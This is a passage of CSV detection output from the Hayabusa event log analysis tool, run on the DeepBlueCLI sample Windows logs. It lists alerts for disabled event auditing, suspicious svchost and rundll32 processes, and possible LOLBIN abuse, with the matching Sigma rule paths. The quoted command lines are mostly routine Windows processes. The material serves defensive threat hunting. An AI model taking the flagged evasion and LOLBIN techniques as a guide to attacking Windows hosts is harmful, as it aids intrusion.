0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:28:38.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:29:27.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:29:27.609 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1aae1 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:29:29.859 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1af2f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:32:23.580 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdate) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /svc | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:32:23.595 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Google Update Service (gupdatem) | Path: ""C:\Program Files\Google\Update\GoogleUpdate.exe"" /medsvc | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 15:43:46.923 +00:00,IE10Win7,4719,high,Evas,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:14:10.202 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:22:14.624 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:22:14.624 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:29:28.865 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:29:28.865 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:39:37.215 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:42:43.762 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:36.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 16:52:58.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 16:52:58.375 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.375 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.468 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.500 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.500 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.734 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.734 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.812 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:58.812 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.171 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.171 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.484 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:52:59.484 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:08.922 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:08.922 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:09.735 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:09.735 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:10.454 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:19.313 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.297 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.329 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.360 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.375 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.407 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:20.422 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:28.080 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:28.080 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:53:28.471 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:25.736 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:34.966 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x190 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:34.997 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 16:58:35.013 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:06:20.341 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0xb44 | User: IEUser | LID: 0x970d9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:06:20.341 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:14:40.529 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:34:07.747 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:34:07.763 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\winsat.exe formal -log -cancelevent 850b2fce-84b7-4abd-a41f-f04c912c6e37 | Path: C:\Windows\System32\WinSAT.exe | PID: 0xfe4 | User: IEUser | LID: 0x970a9,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:35:08.751 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" -IdleTask -TaskName MpIdleTask | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x600 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.229 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.229 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.244 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:08.656 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:09.918 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:37:09.918 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.203 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.468 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.468 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.499 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\itulqket.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x34c | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.499 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.609 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ssh63wbw.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xa50 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.609 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.765 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pcbguge2.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xee8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.765 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.859 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\uacrfkow.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x7d8 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:08.859 +00:00,IE10Win7,4688,medium,Evas,Suspicious Csc.exe Source File Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_csc_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:09.484 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x944 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 17:44:09.499 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe70 | User: IEUser | LID: 0x970a9",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:07:37.968 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:07:37.968 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:46:19.937 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:46:20.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 18:57:20.843 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 18:57:21.015 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:00:18.548 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:05:34.164 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x92c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:05:34.195 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:29.037 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xd20 | User: IE10WIN7$ | LID: 